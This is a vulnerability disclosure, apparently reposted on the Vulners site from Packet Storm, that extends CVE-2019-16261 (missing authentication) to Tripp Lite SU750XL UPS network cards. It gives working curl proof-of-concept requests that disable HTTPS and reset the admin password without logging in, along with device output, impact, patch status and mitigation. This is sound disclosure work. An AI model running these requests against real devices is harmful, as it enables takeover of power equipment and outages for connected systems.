Vulners
Lucene search
Tripp Lite SU750XL UPS Privilege Escalation / Missing Authentication
🗓️ 20 Mar 2025 00:00:00Reported by Lucas Lalumiere, Jim BecherType 
packetstorm🔗 packetstorm.news👁 338 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2019-16261 | 19 Mar 202516:40 | – | circl |
 | CVE-2019-16261 | 12 Sep 201914:07 | – | cve |
 | CVE-2019-16261 | 12 Sep 201914:07 | – | cvelist |
 | EUVD-2019-7065 | 7 Oct 202500:30 | – | euvd |
 | CVE-2019-16261 | 12 Sep 201915:15 | – | nvd |
 | Design/Logic Flaw | 12 Sep 201915:15 | – | prion |
 | CVE-2019-16261 | 7 Jan 202609:30 | – | redhatcve |
[Author]: Lucas Lalumiere
[Contact]: [email protected]
[Date]: 2025-3-17
[Vendor]: Tripp Lite
[Product]: SU750XL UPS
[Firmware]: 12.04.0052
[CVE Reference]: CVE-2019-16261
============================
Affected Products (Tested):
============================
- Tripp Lite PDU's (e.g., PDUMH15AT)
- Tripp Lite UPS's (e.g., SU750XL) *NEW*
======================
Vulnerability Summary:
======================
CVE-2019-16261 describes a critical vulnerability in the Tripp Lite
PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send
POST requests to the `/Forms/` directory to:
- Change admin or manager passwords
- Shut off power to an outlet
- Disable/enable services
Through my own experimentation, I have discovered that this vulnerability
is also effective on Tripp Lite UPS systems, including my Tripp Lite
SU750XL, and applies to firmware 12.04.0052. This suggests the issue
extends beyond just PDUs, as mentionned in the CVE, to the network cards
equipped in Tripp Lite PDU's and UPS's (like my SNMPWEBCARD55) with
vulnerable firmware versions 12.04.0053 and below.
=========================
Proof of Concept (PoC):
=========================
These curl commands, similar to those provided originally by Jim Becher's
blog, are among those I've tested on the SU750XL.
1. Turning off Services (like HTTPS):
```
curl -X POST -d
"netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes"
http://[DEVICE_IP]/Forms/network_web_1
curl -X POST -d "startreset=Restart+PowerAlert" http://
[DEVICE_IP]/Forms/requestreset_1
```
Result (PowerAlert terminal):
```
System settings were changed.
Initiating system shutdown procedure ... complete.
The system is restarting now.
...
SERVICES:
HTTP is enabled on port 80
HTTPS is disabled on port 443
SSH is enabled on port 22
TELNET is enabled on port 23
FTP is enabled on port 21
SYSLOG is enabled
```
2. Change Admin Password
```
curl -X POST -d
"securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes"
http://[DEVICE_IP]/Forms/system_security_1
curl -X POST -d "startreset=Restart+PowerAlert" http://
[DEVICE_IP]/Forms/requestreset_1
```
Result (PowerAlert terminal):
```
System settings were changed.
Initiating system shutdown procedure ... complete.
The system is restarting now.
...
Login: newadmin
Password: *****
Logged in as user newadmin
$ _
```
=======
Impact:
=======
- High Availability Impact: Attackers can remotely control power functions,
affecting critical systems connected to PDU/UPS'.
- High Confidentiality Impact: Attackers can obtain admin access to any of
the device's information via changing credentials.
- High Integrity Impact: Attackers, if not through the POST requests, can
modify any configuration by using modified admin credentials.
===============
Exploit Status:
===============
This vulnerability has already been patched in newer network card firmware
versions and acknowledged by Eaton. It was previously reported in
CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDU's.
=======================
Recommended Mitigation:
=======================
Upgrade webcard firmware to the newest version. You can find the download
here:
- https://tripplite.eaton.com/support/downloads?type=software&subtype=32
===========
References:
===========
- Original discovery:
https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits
- CVE-2019-16261:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261
====================
Discoverer/Credits:
====================
- Jim Becher, 2019-08-19
This disclosure is being submitted to expand upon the original CVE report,
adding additional affected products and detail. My find confirms that both
Tripp Lite UPS and PDU devices equipped with optional network cards (e,g.
SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 28.5
CVSS 3.19.1
EPSS0.00942